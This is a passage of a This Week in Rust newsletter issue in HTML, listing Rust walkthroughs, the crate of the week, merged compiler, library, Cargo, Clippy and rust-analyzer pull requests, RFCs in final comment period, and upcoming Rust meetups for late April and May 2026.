<li>[audio] <a href="https://corrode.dev/podcast/s06e02-helsing/">Helsing with Jon Gjengset</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://blog.sheerluck.dev/posts/learn-rust-structs-enums-pattern-matching-by-building-a-json-parser/">Build a JSON Parser in Rust from Scratch</a></li>
<li><a href="https://medium.com/@carlmkadie/device-envoy-esp-making-embedded-esp32-fun-872e251b88f3">device-envoy-esp: Making Embedded ESP32 Fun: With Rust, Embassy, and Composable Device Abstractions</a></li>
<li><a href="https://rust-projects-write-a-redis-clone.github.io/">Rust Projects - Write a Redis Clone - Version 2.0.0</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=ZC6UWzX3Xug">Rust Parallelism with Rayon - Use ALL CPUs</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#research">Research</a></h5>
<ul>
<li><a href="https://raw.githubusercontent.com/yugr/rust-slides/main/EN.pdf">Performance of Rust language</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#miscellaneous">Miscellaneous</a></h5>
<ul>
<li><a href="https://github.com/szabgab/awesome-axum">awesome axum</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>


<p>This week's crate is <a href="https://github.com/pbkx/dithr">dithr</a>, a buffer-first dithering and halftoning library.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1598">pbkx</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>




<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<ul>
<li><a href="https://sessionize.com/eurorust-2026/"><strong>EuroRust 2026</strong></a>| 2026-05-04 (extended) | Barcelona, Spain | 2026-10-14 – 2026-10-17</li>
<li><a href="https://ndctechtown.com/call-for-papers"><strong>NDC Techtown</strong></a> | 2026-05-03 | Kongsberg, Norway | 2026-09-21 to 23.</li>
<li><a href="https://scientificcomputing.rs/2026/submit-talk"><strong>Scientific Computing in Rust 2026</strong></a>| 2026-06-05 | Virtual | 2026-07-08 - 2026-07-10</li>
</ul>
<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>


<p>480 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-04-21..2026-04-28">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/155392"><code>AliasTerm</code> refactor</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/154794">add <code>on_unmatch_args</code> diagnostic attribute</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155663">eliminate <code>CrateMetadataRef</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155491">fix performance regression introduced in #142531 by excluding <code>Storage{Live,Dead}</code> from CGU size estimation</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155473">prefer <code>-1</code> for <code>None</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/153457">prevent deref coercions in <code>pin!</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155628">streamline <code>CrateMetadataRef</code> construction in <code>provide_one!</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/155565">constify <code>Vec</code> comparisons</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/154372">exposing Float Masks</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155708">fix heap overflow in <code>slice::join</code> caused by misbehaving Borrow</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155684">generalize IO Traits for <code>Arc&lt;T&gt;</code> where <code>&amp;T: IoTrait</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155774">maintain <code>CStringArray</code> null-termination even if <code>Vec::push</code> panics</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155574">move <code>std::io::RawOsError</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155588">implement more traits for field-representing types</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/16934">clean: do not error if explicitly specified target-dir does not exist</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/16796"><code>compile</code>: stabilize <code>build.warnings</code></a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/16935"><code>compile</code>: ignore unused deps if also transitive</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/16920"><code>compile</code>: Log all ignored unused externs</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16025"><code>manual_assert_eq</code>: new lint</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16732">new module style lint: <code>inline_modules</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16845"><code>needless_ifs</code>: handle vertical tab as whitespace to avoid false negative</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16907"><code>inline_modules</code>: fix the rust version the lint was introduced in</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16542">make <code>unused_format_specs</code> catch width issues</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16881">fix <code>from_over_into</code> false positive with conflicting blanket From impl</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16863">fix wrong <code>question_mark</code> suggestion when match arm body is a destructuring assignment</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22132">add .new postfix completion based on expected type (rust-lang/r…</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22179">add <code>unwrap_block</code>, offer <code>unwrap_block</code> and <code>unwrap_branch</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22079">handle if <code>matches!()</code> for <code>replace_if_let_with_match</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22180">offer on compound assign for <code>replace_arith_op</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22184">offer on non-block matcharm for <code>unwrap_branch</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/21979">when renaming a field, rename variables in constructors as well</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22142">fix trait auto import appearing again when trait already been imported as <code>_</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22098">avoid prelude paths when <code>imports.preferPrelude</code> is false</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22183">define the ABI of functions inside extern blocks as the ABI of the extern block</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22166">fix closure capture hints being misplaced for async closures</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22124">generate-method skips trait impl blocks when picking insertion site</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22192">keep the same nonce when cloning a <code>RootDatabase</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22195">make <code>InferenceResult::binding_mode()</code> fallible</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22116">mark <code>enum</code> variants as deprecated when their parent <code>enum</code> is deprecated</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22154">no complete where kw after qualified path</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22151">offer on <code>!</code> for <code>apply_demorgan_iterator</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22150">offer on <code>is_some_and</code> etc. for <code>apply_demorgan_iterator</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22170">parse <code>return #[attr] expr</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22169">parse impl restrictions after the visibility</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22122">pass <code>proc_macro_cwd</code> to <code>Analysis::from_single_file()</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22135">suppress infer vars in monomorphization</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22125">migrate replace qualified name with use to SyntaxEditor</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22078">perf: optimize allocation strategies of output/parser/event</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22121">remove generate impl non syntax factory variant</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>Relatively few perf-affecting changes this week. Perf report is more positive
than users should see due to the <code>-Zincremental-verify-ich</code> related
improvements in <a href="https://github.com/rust-lang/rust/pull/155473">#155473</a>.</p>
<p>Triage done by <strong>@simulacrum</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=9ab01ae53c416f89fe256b79588a76dcbcdc9290&amp;end=ca9a134e0985765ded9cfdde4030a5df4db7e2bd&amp;absolute=false&amp;stat=instructions%3Au">9ab01ae5..ca9a134e</a></p>
<p>1 Regression, 5 Improvements, 3 Mixed; 3 of them in rollups
32 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/master/triage/2026/2026-04-27.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/148214">Consider <code>Result&lt;T, Uninhabited&gt;</code> and <code>ControlFlow&lt;Uninhabited, T&gt;</code> to be equivalent to <code>T</code> for must use lint</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/148799">Switch the destructors implementation for thread locals on Windows to use FLS</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/151379">Stabilize <code>VecDeque::truncate_front</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/152367">Derives <code>Copy</code> for <code>ffi::FromBytesUntilNulError</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/111688">Tracking Issue for ExitCodeExt on Windows</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/153975">remove forever-deprecated and hidden <code>f64</code> methods</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo_1"></a><a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/16936">Remove curl dependency from crates-io crate</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/983">Make stable hashing names consistent</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/984">replace <code>box_patterns</code> in the compiler with <code>deref_patterns</code></a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/988">Create a new Tier 3 target: <code>powerpc64le-unknown-none</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-rfcs"></a><a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3945">RFC: Inheriting of <code>default-features</code> in Cargo</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3931">Rust Foundation Maintainer Fund</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3875">build-std: explicit dependencies</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#unsafe-code-guidelines"></a><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>
<ul>
<li><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues/414">Should validity of a reference depend on the <em>contents</em> of memory in any way?</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>, 
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a> or
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>.</em>
Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3952">Bounded Trait Casting</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3955">Named <code>Fn</code> trait parameters</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-04-29 - 2026-05-27 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-04-29 | Virtual (Girona, ES) | <a href="https://lu.ma/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/8hi2xywi"><strong>Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-05-01 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/312788983/"><strong>Hacker's Hike 0x1</strong></a></li>
</ul>
</li>
<li>2026-05-02 | Virtual (Kampala, UG) | <a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587">Rust Circle Meetup</a><ul>
<li><a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763928837"><strong>Rust Circle Meetup</strong></a></li>
</ul>
</li>
<li>2026-05-03 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314036479/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-05-05 | Virtual (Tel Aviv-yafo, IL) | <a href="https://www.meetup.com/code-mavens">Code Mavens 🦀 - 🐍 - 🐪</a><ul>
<li><a href="https://www.meetup.com/code-mavens/events/314538967/"><strong>Rust code reading and open source contribution</strong></a></li>
</ul>
</li>
<li>2026-05-06 | Virtual (Cardiff, UK) | <a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff">Rust and C++ Cardiff</a><ul>
<li><a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/314301861/"><strong>Practical introduction to SIMD</strong></a></li>
</ul>
</li>
<li>2026-05-06 | Virtual (Girona, ES) | <a href="https://lu.ma/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/rd05z3vo"><strong>Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-05-06 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/314323890/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-05-07 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455928/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-05-07 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/313345240/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-05-12 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254782/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-05-12 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/313506068/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-05-17 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329043/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
<li>2026-05-19 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/rdhhptyjchbzb/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-05-20 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/313572925/"><strong>Mouse Control with Rust</strong></a></li>
</ul>
</li>
<li>2026-05-20 | Virtual (Girona, ES) | <a href="https://lu.ma/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/548kbqhl"><strong>Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-05-21 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/313873203/"><strong>May, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-05-21 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455929/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-05-21 | Virtual (Charlottesville, VA, US) | <a href="https://www.meetup.com/charlottesville-rust-meetup">Charlottesville Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/charlottesville-rust-meetup/events/314477948/"><strong>Tock OS Part #4 - Capsule coding in QEMU!</strong></a></li>
</ul>
</li>
<li>2026-05-26 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254781/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
<li>2026-05-26 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/313506048/"><strong>Lunch &amp; Learn: Seeing Into Your Code - A Practical Guide to Tracing in Rust</strong></a></li>
</ul>
</li>
<li>2026-05-27 | Virtual (Girona, ES) | <a href="https://lu.ma/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/9v7hv2g1"><strong>Weekly coding session</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-05-13 | Malaysia, MY | <a href="https://docs.google.com/forms/d/e/1FAIpQLSfMh6PA05ujl3lS59tJU3DcLHGVZ1zjzJhl49hXEHU7e6vsQA/viewform">Rust Meetup Malaysia</a><ul>
<li><a href="https://docs.google.com/forms/d/e/1FAIpQLSfMh6PA05ujl3lS59tJU3DcLHGVZ1zjzJhl49hXEHU7e6vsQA/viewform"><strong>Rust Meetup May 2026</strong></a></li>
</ul>
</li>
<li>2026-05-16 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a><ul>
<li><a href="https://hasgeek.com/rustbangalore/may-2026-rustacean-meetup/"><strong>May 2026 Rustacean meetup</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-04-29 | Copenhagen, DK | <a href="https://www.meetup.com/copenhagen-rust-community">Copenhagen Rust Community</a><ul>
<li><a href="https://www.meetup.com/copenhagen-rust-community/events/314279730/"><strong>Rust meetup #67</strong></a></li>
</ul>
</li>
<li>2026-04-29 | Paris, FR | <a href="https://www.eventbrite.fr/o/74289178383">Paris Rustaceans</a><ul>
<li><a href="https://www.eventbrite.fr/e/rust-meetup-in-paris-tickets-1984135342220"><strong>Rust Meetup in Paris</strong></a></li>
</ul>
</li>
<li>2026-04-30 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/314292918/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-04-30 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/314229892/"><strong>Rust Manchester April Talk</strong></a></li>
</ul>
</li>
<li>2026-05-02 | Augsburg, DE | <a href="https://rust-munich.de/">Rust Munich</a> and <a href="https://rust-augsburg.github.io/meetup">Rust Augsburg</a><ul>
<li><a href="https://www.luga.de/static/LIT-2026/"><strong>Augsburger Linux-Infotag 2026: Gemeinschaftsstand Rust Augsburg und Rust München</strong></a></li>
</ul>
</li>
<li>2026-05-04 | Amsterdam, NH, NL | <a href="https://www.meetup.com/rust-amsterdam-group">Rust Developers Amsterdam Group</a><ul>
<li><a href="https://www.meetup.com/rust-amsterdam-group/events/314268909/"><strong>Rust Meetup @ JetBrains</strong></a></li>
</ul>
</li>
<li>2026-05-04 | Frankfurt, DE | <a href="https://www.meetup.com/rust-rhein-main">Rust Rhein-Main</a><ul>
<li><a href="https://www.meetup.com/rust-rhein-main/events/314051688/"><strong>Writing a stock portfolio simulation in Rust with Leptos</strong></a></li>
</ul>
</li>
<li>2026-05-05 | Olomouc, CZ | <a href="https://www.meetup.com/rust-moravia">Rust Moravia</a><ul>
<li><a href="https://www.meetup.com/rust-moravia/events/314218493/"><strong>5. Rust Moravia Meetup (Ukaž testy!)</strong></a></li>
</ul>
</li>
<li>2026-05-06 | Milano, MI, IT | <a href="https://www.meetup.com/rust-language-milano">Rust Language Milan</a><ul>
<li><a href="https://www.meetup.com/rust-language-milan/events/314521855/"><strong>Rust Milan @ Python Milano: Python or Rust? Yes!</strong></a></li>
</ul>
</li>
<li>2026-05-06 | Oxford, UK | <a href="https://www.meetup.com/oxford-rust-meetup-group">Oxford ACCU/Rust Meetup.</a><ul>
<li><a href="https://www.meetup.com/oxford-rust-meetup-group/events/314456933/"><strong>Building LLMs from scratch</strong></a></li>
</ul>
</li>
<li>2026-05-07 | Edinburgh, UK | <a href="https://www.meetup.com/rust-edi">Rust and Friends</a><ul>
<li><a href="https://www.meetup.com/rust-and-friends/events/314300802/"><strong>Rust May Talks: Aetherus + Bevy</strong></a></li>
</ul>
</li>
<li>2026-05-13 | Girona, ES | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/ooub1kt0"><strong>Rust Girona Hack &amp; Learn 05 2026</strong></a></li>
</ul>
</li>
<li>2026-05-14 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a><ul>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
</ul>
</li>
<li>2026-05-18 - 2026-05-23 | Amsterdam, NL | <a href="https://2026.rustweek.org/">RustWeek 2026</a><ul>
<li><a href="https://2026.rustweek.org/"><strong>RustWeek 2026</strong></a></li>
</ul>
</li>
<li>2026-05-19 | Aarhus, DK | <a href="https://www.meetup.com/rust-aarhus">Rust Aarhus</a><ul>
<li><a href="https://www.meetup.com/rust-aarhus/events/314129975/"><strong>Hack Night</strong></a></li>
</ul>
</li>
<li>2026-05-19 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313813902/"><strong>Cross-Building &amp; Cross-Testing</strong></a></li>
</ul>
</li>
<li>2026-05-19 | London, UK | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/314313054/"><strong>RustWeek lunch meetup</strong></a></li>
</ul>
</li>
<li>2026-05-21 | Amsterdam, NL | <a href="https://www.meetup.com/rust-amsterdam">RustNL</a><ul>
<li><a href="https://www.meetup.com/rust-nederland/events/314301699/"><strong>RustWeek Hackathon</strong></a></li>
</ul>
</li>
<li>2026-05-22 | Amsterdam, NL | <a href="https://www.meetup.com/rust-amsterdam">RustNL</a><ul>
<li><a href="https://www.meetup.com/rust-nederland/events/314523659/"><strong>Bike tour around Utrecht</strong></a></li>
</ul>
</li>
<li>2026-05-26 | Dortmund, DE | <a href="https://www.meetup.com/rust-dortmund">Rust Dortmund</a><ul>
<li><a href="https://www.meetup.com/rust-dortmund/events/314522781/"><strong>Rust Dortmund Meetup - Agentic Programming - May</strong></a></li>
</ul>
</li>
<li>2026-05-26 | Manchester, UK | <a href="https://www.meetup.com/rust-manchester">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/314452972/"><strong>Rust Manchester May Code Night</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-04-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/311228662/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-04-30 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/314225247/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-05-02 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
